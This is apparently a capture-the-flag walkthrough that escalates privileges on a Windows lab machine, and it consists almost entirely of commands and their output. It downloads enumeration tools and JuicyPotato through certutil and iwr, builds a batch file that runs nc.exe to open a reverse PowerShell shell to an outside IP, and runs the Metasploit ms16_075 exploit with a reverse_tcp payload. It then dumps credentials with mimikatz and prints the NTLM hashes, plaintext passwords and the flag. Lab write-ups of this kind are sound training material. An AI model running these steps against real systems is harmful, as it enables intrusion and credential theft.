VulnStatus : Not Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
             tml
VulnStatus : Not Vulnerable

Result: Not vulnerable

Trying :

wget https://github.com/pentestmonkey/windows-privesc-check/raw/master/windows-privesc-check2.exe
sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/windows-privesc-check2.exe ex.exe
msf shell > ex.exe --audit -a -o report -v

Trying :

wget https://github.com/411Hall/JAWS/raw/master/jaws-enum.ps1
sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/jaws-enum.ps1 jaws.ps1
msf shell > powershell.exe -ExecutionPolicy Bypass -File .\jaws.ps1
msf shell > execute -f powershell.exe -a "-ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt"

"Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (highest privileges) by leveraging the BITS and the SeAssignPrimaryToken or SeImpersonate privilege in a MiTM attack."
CLSID List: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard

Manual Escalation

wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
sudo python3 -m http.server 80
msf > shell
msf > powershell
msf > iwr -outf js.exe http://10.10.14.173/JuicyPotato.exe

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.173 1111 > shell.bat
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337 -c {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}

Automatic Escalation

msf > background
msf > search ms16_075
msf > use exploit/windows/local/ms16_075_reflection_juicy
msf > set payload windows/meterpreter/reverse_tcp
msf > set session 1
msf > set lhost 10.10.14.173
msf > set dcom_port 1337
msf > set CLSID {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}
msf > set lport 8464
msf > run

Result: Server username: NT AUTHORITY\SYSTEM

cd C:\Users\Administrator\Desktop
cat root.txt

Root Flag: 6e9a9fdc6f64e410a68b847bb4b404fa

Post Exploitation

Convert to x64 shell:

use post/windows/manage/archmigrate
set session 2
set IGNORE_SYSTEM true

Get passwords

load kiwi
meterpreter > kiwi_cmd sekurlsa::logonpasswords

Output:

Authentication Id : 0 ; 298603 (00000000:00048e6b)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 5/4/2020 10:20:27 PM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
        msv :
         [00000003] Primary
         * Username : sandra
         * Domain   : MEGACORP
         * NTLM     : 29ab86c5c4d2aab957763e5c1720486d
         * SHA1     : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
         * DPAPI    : f4c73b3f07c4f309ebf086644254bcbc
        tspkg :
        wdigest :
         * Username : sandra
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : sandra
         * Domain   : MEGACORP.LOCAL
         * Password : Password1234!
        ssp :
        credman :

Authentication Id : 0 ; 183955 (00000000:0002ce93)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:24 PM
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : SHIELD$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 183792 (00000000:0002cdf0)
Session           : Service from 0
User Name         : wordpress
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:24 PM
SID               : S-1-5-82-698136220-2753279940-1413493927-70316276-1736946139
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : SHIELD$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SHIELD$
Domain            : MEGACORP
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:01 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : shield$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:08 PM
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : IUSR
         * Domain   : NT AUTHORITY
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:02 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 65711 (00000000:000100af)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:01 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : SHIELD$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 65691 (00000000:0001009b)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:01 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : SHIELD$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 36390 (00000000:00008e26)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:00 PM
SID               : 
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SHIELD$
Domain            : MEGACORP
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:00 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : shield$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Result: Credentials Sandra:Password1234!.